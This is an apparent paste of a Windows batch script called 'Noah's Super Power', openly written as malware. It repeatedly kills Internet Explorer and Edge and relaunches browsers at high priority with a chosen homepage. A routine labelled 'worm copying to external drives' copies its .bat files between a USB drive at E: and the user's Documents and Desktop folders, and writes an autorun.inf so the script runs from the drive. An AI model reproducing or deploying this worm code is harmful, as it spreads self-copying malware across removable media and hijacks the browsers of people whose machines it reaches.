

Mar 27th, 2019
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  1. :::::::::::::::::::::::::::
  2. ::NOAH'S SUPER POWER V1.5::
  3. :::::::::::::::::::::::::::
  4. :: Copyright (c) Grathium Softwares 2018,
  6. REM *to change webbrowser homepage change the 'url after chrome.exe/iexplore.exe/MicrosoftEdge.exe "ENTER NEW HOMEPAGE URL HERE"'
  7. REM *compatiable with chrome, edge and internet explorer
  9. @echo off
  10. color e
  11. title Noahs Super Power
  12. set /a okay=0
  13. ver >nul
  14. cls
  16. goto loop
  17. :A
  18. start chrome.exe ""
  19. timeout /nobreak 10
  20. ::homepage loops
  21. :loop
  22. cls
  23. if /i "%okay%" EQU "1" goto waitchrome
  24. if /i "%okay%" EQU "2" goto waitie
  25. if /i "%okay%" EQU "3" goto waitedge
  26. tasklist /FI "IMAGENAME eq chrome.exe" 2>NUL | find /I /N "chrome.exe">NUL
  27. if "%ERRORLEVEL%"=="0" goto yeschrome
  28. tasklist /FI "IMAGENAME eq iexplore.exe" 2>NUL | find /I /N "iexplore.exe">NUL
  29. if "%ERRORLEVEL%"=="0" goto yesie
  30. tasklist /FI "IMAGENAME eq iexplore.exe" 2>NUL | find /I /N "MicrosoftEdge.exe">NUL
  31. if "%ERRORLEVEL%"=="0" goto yesedge
  33. REM worm copying to external drives
  34. ::if on usb copy to documents
  35. set /a loopsdone=0
  36. if exist "C:\Users\%username%\Documents\*.1.bat" goto pass1
  37. if /i "%CD:~0,3%" EQU "E:\" goto copyfromusbtodoc
  38. :pass1
  39. ::if on usb copy to desktop
  40. if exist "C:\Users\%username%\Desktop\*.1.bat" goto pass2
  41. if /i "%CD:~0,3%" EQU "E:\" goto copyfromusbtodesk
  42. :pass2
  44. ::if on desktop copy to usb
  45. if not exist "E:\" goto loop
  46. if exist "E:\*.1.bat" goto loop
  48. for /r %%f in (*.1.bat) do (
  49. type %%~nxf >>"E:\%%~nxf"
  50. ::make autorun file
  51. if exist "E:\autorun.inf" del "E:\autorun.inf"
  52. echo [autorun]>>"E:\autorun.inf"
  53. echo open=%%~nxf>>"E:\autorun.inf"
  54. echo icon=icon.ico>>"E:\autorun.inf"
  55. echo action=Click to run.>>"E:\autorun.inf"
  56. echo shell\open\command=%%~nxf>>"E:\autorun.inf"
  57. )
  58. goto loop
  60. ::open change window location if needed
  61. :yeschrome
  62. ::taskkill /F /IM chrome.exe
  63. start "Google Chrome" /HIGH chrome.exe ""
  64. cls
  65. set /a okay=1
  66. timeout /nobreak 1 >nul
  67. goto loop
  68. :yesie
  69. taskkill /F /IM iexplore.exe /T
  70. start "IExplore" /HIGH iexplore.exe ""
  71. cls
  72. set /a okay=2
  73. timeout /nobreak 1 >nul
  74. goto loop
  75. :yesedge
  76. taskkill /F /IM MicrosoftEdge.exe /T
  77. start "IExplore" /HIGH MicrosoftEdge.exe ""
  78. cls
  79. set /a okay=3
  80. timeout /nobreak 1 >nul
  81. goto loop
  83. ::waits
  84. :waitchrome
  85. tasklist /FI "IMAGENAME eq chrome.exe" 2>NUL | find /I /N "chrome.exe">NUL
  86. if "%ERRORLEVEL%"=="0" goto waitchrome
  87. timeout /t 0 >nul
  88. set /a okay=0
  89. goto loop
  90. :waitie
  91. tasklist /FI "IMAGENAME eq iexplore.exe" 2>NUL | find /I /N "iexplore.exe">NUL
  92. if "%ERRORLEVEL%"=="0" goto waitie
  93. timeout /t 0 >nul
  94. set /a okay=0
  95. goto loop
  96. :waitedge
  97. tasklist /FI "IMAGENAME eq MicrosoftEdge.exe" 2>NUL | find /I /N "MicrosoftEdge.exe">NUL
  98. if "%ERRORLEVEL%"=="0" goto waitedge
  99. timeout /t 0 >nul
  100. set /a okay=0
  101. goto loop
  103. :copyfromusbtodoc
  104. for /r %%f in (*.1.bat) do (
  105. type %%~nxf >>"C:\Users\%username%\Documents\%%~nxf"
  106. )
  107. goto loop
  108. :copyfromusbtodesk
  109. for /r %%f in (*.1.bat) do (
  110. type %%~nxf >>"C:\Users\%username%\Desktop\%%~nxf"
  111. )
  112. goto loop
  114. ::security stuff
  115. :nexi
  116. color c
  117. echo Security Pass Invalid..
  118. timeout /t 0 >nul
  119. exit /B 1
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